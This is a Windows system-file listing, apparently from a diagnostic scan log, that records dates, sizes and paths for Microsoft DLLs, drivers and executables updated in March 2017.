        2017-03-15 09:42 - 2017-03-04 12:36 - 00483840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CoreMessaging.dll
        2017-03-15 09:41 - 2017-03-04 14:24 - 02482280 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
        2017-03-15 09:41 - 2017-03-04 14:22 - 02213760 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
        2017-03-15 09:41 - 2017-03-04 14:19 - 02049480 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll
        2017-03-15 09:41 - 2017-03-04 14:18 - 01181024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
        2017-03-15 09:41 - 2017-03-04 14:15 - 01000280 _____ (Microsoft Corporation) C:\Windows\system32\SecConfig.efi
        2017-03-15 09:41 - 2017-03-04 14:09 - 07220696 _____ (Microsoft Corporation) C:\Windows\system32\windows.storage.dll
        2017-03-15 09:41 - 2017-03-04 14:09 - 01860288 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store .dll
        2017-03-15 09:41 - 2017-03-04 14:09 - 01293152 _____ (Microsoft Corporation) C:\Windows\system32\LicenseManager.dll
        2017-03-15 09:41 - 2017-03-04 14:09 - 00857440 _____ (Microsoft Corporation) C:\Windows\system32\WWAHost.exe
        2017-03-15 09:41 - 2017-03-04 14:09 - 00527808 _____ (Microsoft Corporation) C:\Windows\system32\WWanAPI.dll
        2017-03-15 09:41 - 2017-03-04 14:06 - 01706488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
        2017-03-15 09:41 - 2017-03-04 14:04 - 08169536 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Protection.PlayR eady.dll
        2017-03-15 09:41 - 2017-03-04 14:04 - 01362512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpmde.dll
        2017-03-15 09:41 - 2017-03-04 14:03 - 22223968 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
        2017-03-15 09:41 - 2017-03-04 14:03 - 04260576 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll
        2017-03-15 09:41 - 2017-03-04 14:03 - 01848072 _____ (Microsoft Corporation) C:\Windows\system32\mfsrcsnk.dll
        2017-03-15 09:41 - 2017-03-04 14:03 - 01702392 _____ (Microsoft Corporation) C:\Windows\system32\mfasfsrcsnk.dll
        2017-03-15 09:41 - 2017-03-04 14:03 - 01473048 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
        2017-03-15 09:41 - 2017-03-04 14:03 - 01454512 _____ (Microsoft Corporation) C:\Windows\system32\mfnetsrc.dll
        2017-03-15 09:41 - 2017-03-04 14:03 - 01301112 _____ (Microsoft Corporation) C:\Windows\system32\mfmpeg2srcsnk.dll
        2017-03-15 09:41 - 2017-03-04 14:03 - 01071736 _____ (Microsoft Corporation) C:\Windows\system32\mfnetcore.dll
        2017-03-15 09:41 - 2017-03-04 13:57 - 02536288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
        2017-03-15 09:41 - 2017-03-04 13:36 - 00126976 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
        2017-03-15 09:41 - 2017-03-04 13:34 - 00237568 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Web.Diagnostics.dll
        2017-03-15 09:41 - 2017-03-04 13:34 - 00123904 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
        2017-03-15 09:41 - 2017-03-04 13:33 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Gaming.UI.GameBar.dll
        2017-03-15 09:41 - 2017-03-04 13:32 - 00193536 _____ (Microsoft Corporation) C:\Windows\system32\WinRtTracing.dll
        2017-03-15 09:41 - 2017-03-04 13:31 - 00467968 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Gaming.XboxLive.Storag e.dll
        2017-03-15 09:41 - 2017-03-04 13:31 - 00149504 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Core. dll
        2017-03-15 09:41 - 2017-03-04 13:30 - 00206336 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
        2017-03-15 09:41 - 2017-03-04 13:29 - 00730112 _____ (Microsoft Corporation) C:\Windows\system32\nshwfp.dll
        2017-03-15 09:41 - 2017-03-04 13:29 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\XblGameSaveExt.dll
        2017-03-15 09:41 - 2017-03-04 13:28 - 01507840 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.FaceAnalysis.dll
        2017-03-15 09:41 - 2017-03-04 13:28 - 00390144 _____ (Microsoft Corporation) C:\Windows\system32\Search.ProtocolHandler.MAPI2.d ll
        2017-03-15 09:41 - 2017-03-04 13:27 - 06574592 _____ (Microsoft Corporation) C:\Windows\system32\wwanmm.dll
        2017-03-15 09:41 - 2017-03-04 13:27 - 00778752 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
        2017-03-15 09:41 - 2017-03-04 13:27 - 00549376 _____ (Microsoft Corporation) C:\Windows\system32\MusUpdateHandlers.dll
        2017-03-15 09:41 - 2017-03-04 13:27 - 00358912 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.dll
        2017-03-15 09:41 - 2017-03-04 13:27 - 00349184 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
        2017-03-15 09:41 - 2017-03-04 13:26 - 00561664 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Walle t.dll
        2017-03-15 09:41 - 2017-03-04 13:26 - 00468992 _____ (Microsoft Corporation) C:\Windows\system32\wwanconn.dll
        2017-03-15 09:41 - 2017-03-04 13:26 - 00409600 _____ (Microsoft Corporation) C:\Windows\system32\wlanui.dll
        2017-03-15 09:41 - 2017-03-04 13:25 - 01388544 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Cred.dll
        2017-03-15 09:41 - 2017-03-04 13:25 - 00245760 _____ (Microsoft Corporation) C:\Windows\system32\WwaApi.dll
        2017-03-15 09:41 - 2017-03-04 13:25 - 00168448 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
        2017-03-15 09:41 - 2017-03-04 13:25 - 00057344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WPDShServiceObj.dll
        2017-03-15 09:41 - 2017-03-04 13:24 - 01293312 _____ (Microsoft Corporation) C:\Windows\system32\wcnwiz.dll
        2017-03-15 09:41 - 2017-03-04 13:23 - 00963584 _____ (Microsoft Corporation) C:\Windows\system32\WebcamUi.dll
        2017-03-15 09:41 - 2017-03-04 13:22 - 00254464 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
        2017-03-15 09:41 - 2017-03-04 13:21 - 06285824 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.dll
        2017-03-15 09:41 - 2017-03-04 13:21 - 01937920 _____ (Microsoft Corporation) C:\Windows\system32\mmc.exe
        2017-03-15 09:41 - 2017-03-04 13:19 - 03777536 _____ (Microsoft Corporation) C:\Windows\system32\MFMediaEngine.dll
        2017-03-15 09:41 - 2017-03-04 13:17 - 07812096 _____ (Microsoft Corporation) C:\Windows\system32\BingMaps.dll
        2017-03-15 09:41 - 2017-03-04 13:17 - 00864256 _____ (Microsoft Corporation) C:\Windows\system32\wpnapps.dll
        2017-03-15 09:41 - 2017-03-04 13:16 - 13441536 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
        2017-03-15 09:41 - 2017-03-04 13:16 - 01908224 _____ (Microsoft Corporation) C:\Windows\system32\AzureSettingSyncProvider.dll
        2017-03-15 09:41 - 2017-03-04 13:16 - 00846336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WebcamUi.dll
        2017-03-15 09:41 - 2017-03-04 13:15 - 01078784 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Streaming.dll
        2017-03-15 09:41 - 2017-03-04 13:13 - 01366016 _____ (Microsoft Corporation) C:\Windows\system32\wpncore.dll
        2017-03-15 09:41 - 2017-03-04 13:12 - 07654912 _____ (Microsoft Corporation) C:\Windows\system32\mos.dll
        2017-03-15 09:41 - 2017-03-04 13:12 - 04596224 _____ (Microsoft Corporation) C:\Windows\system32\xpsrchvw.exe
        2017-03-15 09:41 - 2017-03-04 13:11 - 03441664 _____ (Microsoft Corporation) C:\Windows\system32\MapRouter.dll
        2017-03-15 09:41 - 2017-03-04 13:11 - 02953216 _____ (Microsoft Corporation) C:\Windows\system32\MapGeocoder.dll
        2017-03-15 09:41 - 2017-03-04 13:10 - 02852864 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsThresholdAdminFl owUI.dll
        2017-03-15 09:41 - 2017-03-04 13:10 - 01555456 _____ (Microsoft Corporation) C:\Windows\system32\WMPDMC.exe
        2017-03-15 09:41 - 2017-03-04 13:10 - 01282048 _____ (Microsoft Corporation) C:\Windows\system32\wwansvc.dll
        2017-03-15 09:41 - 2017-03-04 13:10 - 01033216 _____ (Microsoft Corporation) C:\Windows\system32\MapsStore.dll
        2017-03-15 09:41 - 2017-03-04 13:10 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.dll
        2017-03-15 09:41 - 2017-03-04 13:09 - 00846336 _____ (Microsoft Corporation) C:\Windows\system32\MbaeApiPublic.dll
        2017-03-15 09:41 - 2017-03-04 13:09 - 00765440 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Sensors.dll
        2017-03-15 09:41 - 2017-03-04 13:08 - 12349952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
        2017-03-15 09:41 - 2017-03-04 13:08 - 08076288 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
        2017-03-15 09:41 - 2017-03-04 13:08 - 03405312 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
        2017-03-15 09:41 - 2017-03-04 13:08 - 02424320 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Perception.dll
        2017-03-15 09:41 - 2017-03-04 13:08 - 01981440 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
        2017-03-15 09:41 - 2017-03-04 13:08 - 01266176 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Input.Inking.dll
        2017-03-15 09:41 - 2017-03-04 13:07 - 01792512 _____ (Microsoft Corporation) C:\Windows\system32\Wpc.dll
        2017-03-15 09:41 - 2017-03-04 13:07 - 00903680 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
        2017-03-15 09:41 - 2017-03-04 13:07 - 00391168 _____ (Microsoft Corporation) C:\Windows\system32\wuuhext.dll
        2017-03-15 09:41 - 2017-03-04 13:06 - 02538496 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
        2017-03-15 09:41 - 2017-03-04 13:06 - 01424896 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Maps.dll
        2017-03-15 09:41 - 2017-03-04 13:06 - 01369088 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Phone.dll
        2017-03-15 09:41 - 2017-03-04 13:06 - 01131008 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
        2017-03-15 09:41 - 2017-03-04 13:06 - 01013760 _____ (Microsoft Corporation) C:\Windows\system32\ContactApis.dll
        2017-03-15 09:41 - 2017-03-04 13:05 - 03520512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xpsrchvw.exe
        2017-03-15 09:41 - 2017-02-22 09:17 - 00448285 _____ C:\Windows\system32\ApnDatabase.xml
        2017-03-15 09:40 - 2017-03-04 14:27 - 00603488 _____ (Microsoft Corporation) C:\Windows\system32\ContentDeliveryManager.Utiliti es.dll
        2017-03-15 09:40 - 2017-03-04 14:26 - 00794416 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Shell.Broker. dll
        2017-03-15 09:40 - 2017-03-04 14:24 - 02186896 _____ (Microsoft Corporation) C:\Windows\system32\hevcdecoder.dll
        2017-03-15 09:40 - 2017-03-04 14:24 - 00646688 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll
        2017-03-15 09:40 - 2017-03-04 14:24 - 00108384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pdc.sys
        2017-03-15 09:40 - 2017-03-04 14:23 - 02512304 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
        2017-03-15 09:40 - 2017-03-04 14:22 - 07786336 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
        2017-03-15 09:40 - 2017-03-04 14:18 - 00219040 _____ (Microsoft Corporation) C:\Windows\system32\IPHLPAPI.DLL
        2017-03-15 09:40 - 2017-03-04 14:18 - 00118624 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
        2017-03-15 09:40 - 2017-03-04 14:17 - 00409952 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
        2017-03-15 09:40 - 2017-03-04 14:15 - 00063328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dam.sys
        2017-03-15 09:40 - 2017-03-04 14:10 - 02828384 _____ (Microsoft Corporation) C:\Windows\system32\d3d11.dll
        2017-03-15 09:40 - 2017-03-04 14:10 - 02189664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
        2017-03-15 09:40 - 2017-03-04 14:10 - 00360040 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlows.exe
        2017-03-15 09:40 - 2017-03-04 14:09 - 02750384 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
        2017-03-15 09:40 - 2017-03-04 14:09 - 01157000 _____ (Microsoft Corporation) C:\Windows\system32\twinapi.appcore.dll
        2017-03-15 09:40 - 2017-03-04 14:09 - 00681312 _____ (Microsoft Corporation) C:\Windows\system32\SHCore.dll
        2017-03-15 09:40 - 2017-03-04 14:09 - 00658784 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys
        2017-03-15 09:40 - 2017-03-04 14:09 - 00635864 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll
        2017-03-15 09:40 - 2017-03-04 14:09 - 00396168 _____ (Microsoft Corporation) C:\Windows\system32\wlanapi.dll
        2017-03-15 09:40 - 2017-03-04 14:08 - 00450400 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
        2017-03-15 09:40 - 2017-03-04 14:08 - 00223584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
        2017-03-15 09:40 - 2017-03-04 14:07 - 00432992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys
        2017-03-15 09:40 - 2017-03-04 14:04 - 01063472 _____ (Microsoft Corporation) C:\Windows\system32\mfds.dll
        2017-03-15 09:40 - 2017-03-04 14:03 - 01989072 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
        2017-03-15 09:40 - 2017-03-04 14:03 - 01723560 _____ (Microsoft Corporation) C:\Windows\system32\WpcMon.exe
        2017-03-15 09:40 - 2017-03-04 14:03 - 01694712 _____ (Microsoft Corporation) C:\Windows\system32\winmde.dll
        2017-03-15 09:40 - 2017-03-04 14:03 - 01062480 _____ (Microsoft Corporation) C:\Windows\system32\mfsvr.dll
        2017-03-15 09:40 - 2017-03-04 14:03 - 00811416 _____ (Microsoft Corporation) C:\Windows\system32\MFCaptureEngine.dll
        2017-03-15 09:40 - 2017-03-04 14:03 - 00755648 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
        2017-03-15 09:40 - 2017-03-04 14:03 - 00596040 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
        2017-03-15 09:40 - 2017-03-04 14:03 - 00523712 _____ (Microsoft Corporation) C:\Windows\system32\DMRServer.dll
        2017-03-15 09:40 - 2017-03-04 14:03 - 00443232 _____ (Microsoft Corporation) C:\Windows\system32\MMDevAPI.dll
        2017-03-15 09:40 - 2017-03-04 14:03 - 00382272 _____ (Microsoft Corporation) C:\Windows\system32\LockAppHost.exe
        2017-03-15 09:40 - 2017-03-04 14:03 - 00160096 _____ (Microsoft Corporation) C:\Windows\system32\CloudExperienceHostBroker.dll
        2017-03-15 09:40 - 2017-03-04 14:01 - 00137936 _____ (Microsoft Corporation) C:\Windows\system32\AuthHost.exe
        2017-03-15 09:40 - 2017-03-04 13:57 - 00387872 _____ (Microsoft Corporation) C:\Windows\system32\wmpps.dll
        2017-03-15 09:40 - 2017-03-04 13:39 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\RDXTaskFactory.dll
        2017-03-15 09:40 - 2017-03-04 13:37 - 01631232 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.dll
        2017-03-15 09:40 - 2017-03-04 13:36 - 22565376 _____ (Microsoft Corporation) C:\Windows\system32\edgehtml.dll
        2017-03-15 09:40 - 2017-03-04 13:36 - 00119296 _____ (Microsoft Corporation) C:\Windows\system32\UserDataTimeUtil.dll
        2017-03-15 09:40 - 2017-03-04 13:36 - 00101888 _____ (Microsoft Corporation) C:\Windows\system32\DuCsps.dll
        2017-03-15 09:40 - 2017-03-04 13:36 - 00073728 _____ (Microsoft Corporation) C:\Windows\system32\usoapi.dll
        2017-03-15 09:40 - 2017-03-04 13:35 - 00053248 _____ (Microsoft Corporation) C:\Windows\system32\musdialoghandlers.dll
        2017-03-15 09:40 - 2017-03-04 13:35 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\odbcconf.dll
        2017-03-15 09:40 - 2017-03-04 13:34 - 00226304 _____ (Microsoft Corporation) C:\Windows\system32\MusNotification.exe
        2017-03-15 09:40 - 2017-03-04 13:34 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\MusNotificationUx.exe
        2017-03-15 09:40 - 2017-03-04 13:34 - 00047104 _____ (Microsoft Corporation) C:\Windows\system32\wfdprov.dll
        2017-03-15 09:40 - 2017-03-04 13:33 - 00295424 _____ (Microsoft Corporation) C:\Windows\system32\unimdm.tsp
        2017-03-15 09:40 - 2017-03-04 13:33 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\netiougc.exe
        2017-03-15 09:40 - 2017-03-04 13:32 - 00263680 _____ (Microsoft Corporation) C:\Windows\system32\ExSMime.dll
        2017-03-15 09:40 - 2017-03-04 13:32 - 00179712 _____ (Microsoft Corporation) C:\Windows\system32\MCCSEngineShared.dll
        2017-03-15 09:40 - 2017-03-04 13:32 - 00113664 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.ServiceDisc overy.Dnssd.dll
        2017-03-15 09:40 - 2017-03-04 13:31 - 00322048 _____ (Microsoft Corporation) C:\Windows\system32\accountaccessor.dll
        2017-03-15 09:40 - 2017-03-04 13:31 - 00266240 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcore6.dll
        2017-03-15 09:40 - 2017-03-04 13:31 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\VCardParser.dll
        2017-03-15 09:40 - 2017-03-04 13:30 - 00635904 _____ (Microsoft Corporation) C:\Windows\system32\FlightSettings.dll
        2017-03-15 09:40 - 2017-03-04 13:30 - 00535552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\nwifi.sys
        2017-03-15 09:40 - 2017-03-04 13:30 - 00418304 _____ C:\Windows\system32\Windows.Perception.Stub.dll
        2017-03-15 09:40 - 2017-03-04 13:30 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
        2017-03-15 09:40 - 2017-03-04 13:30 - 00127488 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Credentials.U I.UserConsentVerifier.dll
        2017-03-15 09:40 - 2017-03-04 13:30 - 00120320 _____ (Microsoft Corporation) C:\Windows\system32\DafPrintProvider.dll
        2017-03-15 09:40 - 2017-03-04 13:30 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpipreg.sys
        2017-03-15 09:40 - 2017-03-04 13:29 - 01291264 _____ (Microsoft Corporation) C:\Windows\system32\MSVPXENC.dll
        2017-03-15 09:40 - 2017-03-04 13:29 - 00249856 _____ (Microsoft Corporation) C:\Windows\system32\cemapi.dll
        2017-03-15 09:40 - 2017-03-04 13:29 - 00235008 _____ (Microsoft Corporation) C:\Windows\system32\tapi32.dll
        2017-03-15 09:40 - 2017-03-04 13:29 - 00203264 _____ (Microsoft Corporation) C:\Windows\system32\PimIndexMaintenance.dll
        2017-03-15 09:40 - 2017-03-04 13:29 - 00082944 _____ (Microsoft Corporation) C:\Windows\system32\moshost.dll
        2017-03-15 09:40 - 2017-03-04 13:28 - 00912384 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.SmartCards.dll
        2017-03-15 09:40 - 2017-03-04 13:28 - 00741888 _____ (Microsoft Corporation) C:\Windows\system32\internetmail.dll
        2017-03-15 09:40 - 2017-03-04 13:28 - 00587776 _____ (Microsoft Corporation) C:\Windows\system32\vpnike.dll
        2017-03-15 09:40 - 2017-03-04 13:28 - 00568320 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.LowLevel.dll
        2017-03-15 09:40 - 2017-03-04 13:28 - 00556544 _____ (Microsoft Corporation) C:\Windows\system32\iprtrmgr.dll
        2017-03-15 09:40 - 2017-03-04 13:28 - 00462848 _____ (Microsoft Corporation) C:\Windows\system32\wlansec.dll
        2017-03-15 09:40 - 2017-03-04 13:28 - 00264192 _____ (Microsoft Corporation) C:\Windows\system32\ppcsnap.dll
        2017-03-15 09:40 - 2017-03-04 13:28 - 00216576 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Scanners.dll
        2017-03-15 09:40 - 2017-03-04 13:27 - 00719872 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdiWiFi.sys
        2017-03-15 09:40 - 2017-03-04 13:27 - 00590336 _____ (Microsoft Corporation) C:\Windows\system32\efswrt.dll
        2017-03-15 09:40 - 2017-03-04 13:27 - 00460288 _____ (Microsoft Corporation) C:\Windows\system32\CredProvDataModel.dll
        2017-03-15 09:40 - 2017-03-04 13:27 - 00456192 _____ (Microsoft Corporation) C:\Windows\system32\puiobj.dll
        2017-03-15 09:40 - 2017-03-04 13:27 - 00446976 _____ (Microsoft Corporation) C:\Windows\system32\MapConfiguration.dll
        2017-03-15 09:40 - 2017-03-04 13:27 - 00295424 _____ (Microsoft Corporation) C:\Windows\system32\CloudBackupSettings.dll
        2017-03-15 09:40 - 2017-03-04 13:27 - 00292864 _____ (Microsoft Corporation) C:\Windows\system32\updatehandlers.dll
        2017-03-15 09:40 - 2017-03-04 13:27 - 00252416 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Authenticatio n.Identity.Provider.dll
        2017-03-15 09:40 - 2017-03-04 13:27 - 00200192 _____ (Microsoft Corporation) C:\Windows\system32\puiapi.dll
        2017-03-15 09:40 - 2017-03-04 13:26 - 00949248 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.PointOfService .dll
        2017-03-15 09:40 - 2017-03-04 13:26 - 00658432 _____ (Microsoft Corporation) C:\Windows\system32\rasmans.dll
        2017-03-15 09:40 - 2017-03-04 13:26 - 00631296 _____ (Microsoft Corporation) C:\Windows\system32\WlanMediaManager.dll
        2017-03-15 09:40 - 2017-03-04 13:26 - 00476160 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
        2017-03-15 09:40 - 2017-03-04 13:26 - 00431616 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Cortana.Desktop.dll
        2017-03-15 09:40 - 2017-03-04 13:26 - 00383488 _____ (Microsoft Corporation) C:\Windows\system32\DavSyncProvider.dll
        2017-03-15 09:40 - 2017-03-04 13:26 - 00366080 _____ (Microsoft Corporation) C:\Windows\system32\SearchFolder.dll
        2017-03-15 09:40 - 2017-03-04 13:26 - 00307200 _____ (Microsoft Corporation) C:\Windows\system32\PrintDialogs3D.dll
        2017-03-15 09:40 - 2017-03-04 13:25 - 00748544 _____ (Microsoft Corporation) C:\Windows\system32\ChatApis.dll
        2017-03-15 09:40 - 2017-03-04 13:25 - 00579584 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.UX.EapReque stHandler.dll
        2017-03-15 09:40 - 2017-03-04 13:25 - 00548864 _____ (Microsoft Corporation) C:\Windows\system32\usocore.dll
        2017-03-15 09:40 - 2017-03-04 13:25 - 00437248 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Usb.dll
        2017-03-15 09:40 - 2017-03-04 13:25 - 00425984 _____ (Microsoft Corporation) C:\Windows\system32\aadcloudap.dll
        2017-03-15 09:40 - 2017-03-04 13:25 - 00320000 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store .TestingFramework.dll
        2017-03-15 09:40 - 2017-03-04 13:25 - 00284160 _____ (Microsoft Corporation) C:\Windows\system32\AboveLockAppHost.dll
        2017-03-15 09:40 - 2017-03-04 13:24 - 01025536 _____ (Microsoft Corporation) C:\Windows\system32\XboxNetApiSvc.dll
        2017-03-15 09:40 - 2017-03-04 13:24 - 00945664 _____ (Microsoft Corporation) C:\Windows\system32\iphlpsvc.dll
        2017-03-15 09:40 - 2017-03-04 13:24 - 00671744 _____ (Microsoft Corporation) C:\Windows\system32\mbsmsapi.dll
        2017-03-15 09:40 - 2017-03-04 13:23 - 01184256 _____ (Microsoft Corporation) C:\Windows\system32\Unistore.dll
        2017-03-15 09:40 - 2017-03-04 13:23 - 01145856 _____ (Microsoft Corporation) C:\Windows\system32\EmailApis.dll
        2017-03-15 09:40 - 2017-03-04 13:23 - 00945152 _____ (Microsoft Corporation) C:\Windows\system32\rasgcw.dll
        2017-03-15 09:40 - 2017-03-04 13:23 - 00820224 _____ (Microsoft Corporation) C:\Windows\system32\PrintRenderAPIHost.DLL
        2017-03-15 09:40 - 2017-03-04 13:23 - 00583680 _____ (Microsoft Corporation) C:\Windows\system32\PrintDialogs.dll
        2017-03-15 09:40 - 2017-03-04 13:23 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\winspool.drv
        2017-03-15 09:40 - 2017-03-04 13:23 - 00330752 _____ (Microsoft Corporation) C:\Windows\system32\NgcCtnrSvc.dll
        2017-03-15 09:40 - 2017-03-04 13:21 - 00945664 _____ (Microsoft Corporation) C:\Windows\system32\WpcWebFilter.dll
        2017-03-15 09:40 - 2017-03-04 13:21 - 00809984 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Storage.Search.dll
        2017-03-15 09:40 - 2017-03-04 13:21 - 00779776 _____ (Microsoft Corporation) C:\Windows\system32\cscui.dll
        2017-03-15 09:40 - 2017-03-04 13:21 - 00591360 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
        2017-03-15 09:40 - 2017-03-04 13:20 - 01280512 _____ (Microsoft Corporation) C:\Windows\system32\werconcpl.dll
        2017-03-15 09:40 - 2017-03-04 13:20 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Authenticatio n.Web.Core.dll
        2017-03-15 09:40 - 2017-03-04 13:20 - 00650752 _____ (Microsoft Corporation) C:\Windows\system32\RDXService.dll
        2017-03-15 09:40 - 2017-03-04 13:20 - 00611328 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Graphics.Printing.dll
        2017-03-15 09:40 - 2017-03-04 13:19 - 23676416 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
        2017-03-15 09:40 - 2017-03-04 13:19 - 01639424 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
        2017-03-15 09:40 - 2017-03-04 13:19 - 01589760 _____ (Microsoft Corporation) C:\Windows\system32\msdtctm.dll
        2017-03-15 09:40 - 2017-03-04 13:19 - 01403392 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Editing.dll
        2017-03-15 09:40 - 2017-03-04 13:19 - 00552960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\csc.sys
        2017-03-15 09:40 - 2017-03-04 13:19 - 00458752 _____ (Microsoft Corporation) C:\Windows\system32\RTMediaFrame.dll
        2017-03-15 09:40 - 2017-03-04 13:19 - 00410112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
        2017-03-15 09:40 - 2017-03-04 13:18 - 17198592 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
        2017-03-15 09:40 - 2017-03-04 13:18 - 01762816 _____ (Microsoft Corporation) C:\Windows\system32\MSPhotography.dll
        2017-03-15 09:40 - 2017-03-04 13:18 - 01189376 _____ (Microsoft Corporation) C:\Windows\system32\sdengin2.dll
        2017-03-15 09:40 - 2017-03-04 13:18 - 00156672 _____ (Microsoft Corporation) C:\Windows\system32\RelPost.exe
        2017-03-15 09:40 - 2017-03-04 13:17 - 01105408 _____ (Microsoft Corporation) C:\Windows\system32\MiracastReceiver.dll
        2017-03-15 09:40 - 2017-03-04 13:17 - 00661504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WpcWebFilter.dll
        2017-03-15 09:40 - 2017-03-04 13:16 - 00870400 _____ (Microsoft Corporation) C:\Windows\system32\mfmkvsrcsnk.dll
        2017-03-15 09:40 - 2017-03-04 13:16 - 00654336 _____ (Microsoft Corporation) C:\Windows\system32\srmscan.dll
        2017-03-15 09:40 - 2017-03-04 13:16 - 00626688 _____ (Microsoft Corporation) C:\Windows\system32\SpaceControl.dll
        2017-03-15 09:40 - 2017-03-04 13:16 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\wpninprc.dll
        2017-03-15 09:40 - 2017-03-04 13:15 - 18362368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
        2017-03-15 09:40 - 2017-03-04 13:15 - 01837056 _____ (Microsoft Corporation) C:\Windows\system32\workfolderssvc.dll
